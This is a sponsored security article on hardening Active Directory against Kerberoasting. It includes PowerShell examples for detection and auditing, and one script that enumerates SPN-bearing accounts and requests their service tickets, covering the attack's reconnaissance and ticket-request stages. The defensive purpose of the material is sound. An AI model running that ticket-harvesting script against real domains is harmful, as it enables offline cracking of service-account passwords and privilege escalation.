How to harden your Active Directory against Kerberoasting
Kerberoasting is a common attack against Microsoft Active Directory that lets attackers compromise service accounts with a low risk of detection. Because it uses only legitimate accounts and legitimate Kerberos requests, it is hard to tell apart from normal activity and can be highly effective. However, robust password security for service accounts can keep attackers at bay.
First, what is Kerberoasting? The name comes from ‘Kerberos’, the authentication protocol used in Active Directory, which verifies the identity of a user or computer requesting access to resources.
Kerberoasting is a privilege escalation technique in which an attacker who controls an ordinary Windows domain user account obtains Kerberos service tickets for accounts that have a Service Principal Name (SPN) registered, then tries to crack the service account’s password from those tickets offline. If successful, they can escalate to anything the targeted account can reach.
Multi-pronged attack
How does an attack work in practice? There are five key stages:
- The attacker begins by taking control of an existing Windows domain user account. They may have gained access to it through any of the traditional methods, such as credentials stolen via phishing or malware. Any domain user account will do.
- They then identify accounts in Active Directory that have an SPN attached, using tools such as GhostPack’s Rubeus or a plain LDAP query for objects with a servicePrincipalName value. These service accounts are attractive targets because they often hold high-level permissions or even domain administrator rights.
- Using the account they control, the attacker sends a service ticket request (TGS-REQ) for the target SPN to the ticket granting service (TGS) on a domain controller. The returned ticket is encrypted with a key derived from the target service account’s password; with the RC4 encryption type that key is simply the account’s NT hash, which is why attackers prefer to request RC4 tickets where the domain still allows them.
- The attacker extracts the ticket and takes it offline, which conceals the rest of the attack: no further interaction with the domain is needed, so there is no unusual network traffic left to give them away.
- Finally, the perpetrator runs an offline dictionary or brute-force attack against the encrypted ticket, trying candidate passwords until one decrypts it and so recovering the service account’s plaintext password. They can then access anything that account can access.
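The following is an added example (not code from the article or from Specops) showing why stages two and three need nothing more than an ordinary domain account: it enumerates user accounts that carry an SPN over LDAP and then asks the KDC for a service ticket through the .NET KerberosRequestorSecurityToken class, the same API that tools such as Rubeus and PowerView wrap. It assumes it is run on a domain-joined Windows host as any authenticated domain user and that the default LDAP root (the current domain) is reachable; the function names are the example’s own.

```powershell
# Added example: stages 2 and 3 of Kerberoasting from an ordinary domain user account.
# Assumes a domain-joined host; no admin rights are needed for any step below.
Add-Type -AssemblyName System.IdentityModel

function Get-SpnUserAccount {
    # LDAP filter: enabled user objects that have at least one servicePrincipalName.
    # Computer accounts and gMSAs are deliberately excluded: their passwords are long and
    # random, so their tickets are not worth cracking. krbtgt is excluded for the same reason.
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)' +
                       '(!(sAMAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName','servicePrincipalName','pwdLastSet'))
    foreach ($r in $searcher.FindAll()) {
        [pscustomobject]@{
            SamAccountName  = [string]$r.Properties['samaccountname'][0]
            Spns            = @($r.Properties['serviceprincipalname'])
            PasswordLastSet = [datetime]::FromFileTimeUtc([int64]$r.Properties['pwdlastset'][0])
        }
    }
}

function Request-ServiceTicket {
    param([Parameter(Mandatory)][string]$Spn)
    # The KDC answers with a TGS-REP whose ticket is encrypted under the service account's
    # long-term key. GetRequest() builds an AP-REQ containing that ticket and, as a side
    # effect, leaves it in the caller's ticket cache (visible with 'klist').
    $token = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $Spn
    $apReq = $token.GetRequest()
    [pscustomobject]@{ Spn = $Spn; ApReqBytes = $apReq.Length }
}

# Stage 2: find roastable accounts. Stage 3: request one ticket per account.
$targets = Get-SpnUserAccount
foreach ($t in $targets) {
    $spn = $t.Spns[0]
    try   { Request-ServiceTicket -Spn $spn }
    catch { Write-Warning "Ticket request for $spn failed: $($_.Exception.Message)" }
}
# Stage 4 is copying the cached tickets off the host; stage 5 is running a cracker such as
# Hashcat or John the Ripper against them, which needs no further contact with the domain.
```

Nothing in this exchange is abnormal from the domain controller’s point of view: the KDC issues a service ticket to any authenticated principal that asks, without checking whether the requester is authorized to use the service. That is why the defenses later in the article concentrate on making the ticket useless (a password that cannot be cracked) rather than on blocking the request.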
Verizon’s Data Breach Investigations Report found stolen credentials are involved in 44.7% of breaches.
Adversary advantages
Kerberoasting involves several steps, but freely available tools handle both finding accounts with an associated SPN and cracking the resulting ticket, and the technique has significant advantages for attackers:
- Any authenticated domain user can request a service ticket for any SPN; the KDC does not check whether the requester is allowed to use the service. One compromised account is just as useful as another.
- Because the cracking happens offline, against a ticket the attacker already holds, they can keep guessing indefinitely without producing failed logons or any other event on the domain. Tools like John the Ripper or Hashcat can be deployed.
- Kerberoasting doesn’t rely on malware: the ticket request is a legitimate protocol exchange, so endpoint tools like antivirus software see nothing malicious.
How to protect your Active Directory
It’s easy to see why Kerberoasting appeals to cybercriminals. However, organizations can take steps to protect their AD from the danger.
- Enforce strong service-account passwords: Each SPN-enabled account should be protected by a long, random password that is not reused anywhere else. At 25 random characters or more, offline cracking becomes impractical and the chances of a successful Kerberoasting attack are hugely diminished.
- Reduce SPN footprint: Audit your existing SPN-enabled accounts, consolidating duplicate accounts or disabling unused ones altogether. The goal is to minimize the number of individual SPN credentials you need to protect. Group Managed Service Accounts (gMSAs) also help: Active Directory generates and rotates their long random passwords automatically, so there is no human-chosen password to crack.
- Control privileges: Restrict service accounts to only the permissions they require, and make sure they aren’t members of high-privilege groups such as Domain Admins. A tiered administration model also ensures that a compromised service account can’t be escalated to domain-wide privileges.
- Monitor Kerberos traffic for anomalies: Watch for early-stage Kerberoasting reconnaissance. Every service ticket request is recorded on the issuing domain controller as Security event ID 4769, and a security information and event management (SIEM) solution can be configured to flag unusual patterns in those events, such as a single account requesting tickets for many different SPNs within a short window, particularly when the requests use RC4 (ticket encryption type 0x17) in an environment that normally issues AES tickets.
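Here is the detection rule from the last bullet as an added example (not the article’s or any vendor’s code), run over constructed sample events rather than a live Security log so it can be tried anywhere. Each 4769 event carries the requesting account, the service account the ticket was issued for, the ticket encryption type and the client address; one account collecting tickets for many distinct service accounts in a few minutes, especially with RC4, is the Kerberoasting signature. The threshold, window and sample data are assumptions chosen for illustration.

```powershell
# Added example: flag accounts that request service tickets for many different service
# accounts in a short window (the Kerberoasting pattern in Security event 4769 data).
function Find-KerberoastSuspect {
    param(
        # Objects with Time (DateTime), Account, ServiceName, EncType (e.g. '0x17'), ClientIp
        [Parameter(Mandatory)][object[]]$Events,
        [int]$MinDistinctServices = 5,    # assumed threshold; tune to your environment
        [int]$WindowMinutes = 10          # assumed window
    )
    # Tickets for computer accounts (names ending in $) and krbtgt are not crackable in
    # practice, so drop them; otherwise normal logon noise (CIFS, LDAP) trips the rule.
    $relevant = $Events | Where-Object { $_.ServiceName -notmatch '\$$' -and $_.ServiceName -ne 'krbtgt' }

    foreach ($grp in ($relevant | Group-Object Account)) {
        $sorted = @($grp.Group | Sort-Object Time)
        # Sliding window: from each event, count distinct services over the next WindowMinutes.
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $start = $sorted[$i].Time
            $end   = $start.AddMinutes($WindowMinutes)
            $inWindow = @($sorted | Where-Object { $_.Time -ge $start -and $_.Time -le $end })
            $services = @($inWindow.ServiceName | Sort-Object -Unique)
            if ($services.Count -ge $MinDistinctServices) {
                [pscustomobject]@{
                    Account          = $grp.Name
                    WindowStart      = $start
                    DistinctServices = $services.Count
                    Rc4Requests      = @($inWindow | Where-Object { $_.EncType -eq '0x17' }).Count
                    ClientIps        = (@($inWindow.ClientIp | Sort-Object -Unique) -join ',')
                    Services         = ($services -join ',')
                }
                break   # one alert per account is enough; the SOC can pivot from there
            }
        }
    }
}

# Constructed sample: 'jdoe' sweeps eight service accounts with RC4 in two minutes from one
# workstation; 'asmith' makes two ordinary AES requests. Only jdoe should be reported.
$t0 = Get-Date '2024-05-01T09:00:00'
$svcs = 'svc-sql','svc-web','svc-backup','svc-sharepoint','svc-exchange','svc-sccm','svc-ftp','svc-report'
$sample = @()
for ($k = 0; $k -lt $svcs.Count; $k++) {
    $sample += [pscustomobject]@{ Time = $t0.AddSeconds(15 * $k); Account = 'jdoe'; ServiceName = $svcs[$k]; EncType = '0x17'; ClientIp = '10.1.20.55' }
}
$sample += [pscustomobject]@{ Time = $t0.AddMinutes(1); Account = 'asmith'; ServiceName = 'svc-sql'; EncType = '0x12'; ClientIp = '10.1.30.12' }
$sample += [pscustomobject]@{ Time = $t0.AddMinutes(3); Account = 'asmith'; ServiceName = 'FS01$';   EncType = '0x12'; ClientIp = '10.1.30.12' }

Find-KerberoastSuspect -Events $sample | Format-List
```

To feed real data instead of the sample, collect from each domain controller with Get-WinEvent (LogName 'Security', Id 4769), convert each event with its ToXml() method and map the EventData fields TargetUserName, ServiceName, TicketEncryptionType and IpAddress onto Account, ServiceName, EncType and ClientIp (IpAddress is often prefixed with ::ffff: for IPv4 clients). A low-and-slow attacker who spreads requests over hours will slip under a short window, so pair this rule with a baseline of which accounts normally request which services.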
Scan your AD for stale accounts
Specops Password Auditor is a read-only tool that lets you proactively scan for weak, reused, and breached passwords in your Active Directory environment. It helps audit the service accounts in the domain for password security and gives visibility into service accounts that hold administrator permissions.
The exportable report gives you a full view of stale accounts in your organization, which are often a starting point for Kerberoasting attacks. Download your free tool here.
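The following is an added example (not the article’s code and not Specops Password Auditor) of a read-only audit that applies the hardening checklist above to every user account that carries an SPN: it reports password age, direct membership of high-privilege groups, and whether the account’s msDS-SupportedEncryptionTypes still permits RC4 tickets, the cheapest kind to crack. It assumes the RSAT ActiveDirectory module is installed and the caller can read the domain; the age threshold and group list are assumptions to adjust.

```powershell
# Added example: read-only Kerberoasting exposure audit for SPN-bearing user accounts.
# Assumes the ActiveDirectory (RSAT) module and read access to the domain.
Import-Module ActiveDirectory

function Get-KerberoastExposure {
    param(
        [int]$MaxPasswordAgeDays = 365,   # assumed threshold for "stale"
        [string[]]$PrivilegedGroups = @('Domain Admins','Enterprise Admins','Administrators',
                                        'Schema Admins','Account Operators','Backup Operators')
    )
    # msDS-SupportedEncryptionTypes bit flags: 0x4 = RC4-HMAC, 0x8 = AES128, 0x10 = AES256.
    # If neither AES bit is set (including when the attribute is unset), RC4 tickets can be issued.
    $aesBits = 0x18
    $props = 'servicePrincipalName','PasswordLastSet','MemberOf','msDS-SupportedEncryptionTypes','LastLogonDate'

    # Get-ADUser returns neither computer accounts nor gMSAs, which is what we want here:
    # only user objects with a human-set password are practical Kerberoasting targets.
    Get-ADUser -LDAPFilter '(&(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))' -Properties $props |
        ForEach-Object {
            $enc        = [int]($_.'msDS-SupportedEncryptionTypes')          # $null becomes 0
            $groupNames = @($_.MemberOf | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' })
            $privHits   = @($groupNames | Where-Object { $PrivilegedGroups -contains $_ })
            $pwAgeDays  = if ($_.PasswordLastSet) { [int]((Get-Date) - $_.PasswordLastSet).TotalDays } else { -1 }

            [pscustomobject]@{
                SamAccountName   = $_.SamAccountName
                Enabled          = $_.Enabled
                SpnCount         = @($_.servicePrincipalName).Count
                PasswordAgeDays  = $pwAgeDays
                StalePassword    = ($pwAgeDays -gt $MaxPasswordAgeDays)
                Rc4Allowed       = (($enc -band $aesBits) -eq 0)
                PrivilegedGroups = ($privHits -join ';')   # direct membership only
                LastLogonDate    = $_.LastLogonDate
            }
        }
}

# Usage: worst offenders first (privileged, RC4-capable, oldest password).
Get-KerberoastExposure |
    Sort-Object @{Expression = { $_.PrivilegedGroups -ne '' }; Descending = $true},
                @{Expression = 'Rc4Allowed'; Descending = $true},
                @{Expression = 'PasswordAgeDays'; Descending = $true} |
    Format-Table SamAccountName, Enabled, SpnCount, PasswordAgeDays, StalePassword, Rc4Allowed, PrivilegedGroups -AutoSize
```

Two caveats: the privileged-group check only looks at direct membership, so nested membership needs Get-ADPrincipalGroupMembership or a check of the adminCount attribute, and the script does not find duplicate SPNs, which setspn -X reports. Every account the report lists with a stale password or a privileged group is a candidate for migration to a gMSA or, at minimum, for a fresh 25-plus character random password.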
Prevent Kerberoasting attacks
Kerberoasting is an attack built across several stages. However, one thing is certain: password security sits at the heart of your defense.
This works on two major levels.
First, before attackers can request a service ticket tied to an SPN account, they need control of some other domain user account. They get it through well-known means, such as phishing or malware.
Strong passwords and multi-factor authentication (MFA) are both key to protecting those accounts against this danger.
By ensuring your passwords meet the most stringent security demands, you can protect your organization, and its employees, from the first stage of a Kerberoasting attack.
Second, there’s the attack itself. As we’ve seen, offline cracking struggles against lengthy, unique passwords of 25 characters or more. By ensuring all your SPN-linked accounts are protected by such passwords, you take a huge step towards securing your Active Directory.
Specops Password Policy makes it easy to block weak passwords and enforce the creation of strong, unique passphrases. On top of that, it continuously scans your AD against a growing list of over 4 billion compromised passwords, alerting end users if their password is found to be breached.
Interested to know how this could work in your environment? Get in touch for a demo.
Sponsored and written by Specops Software.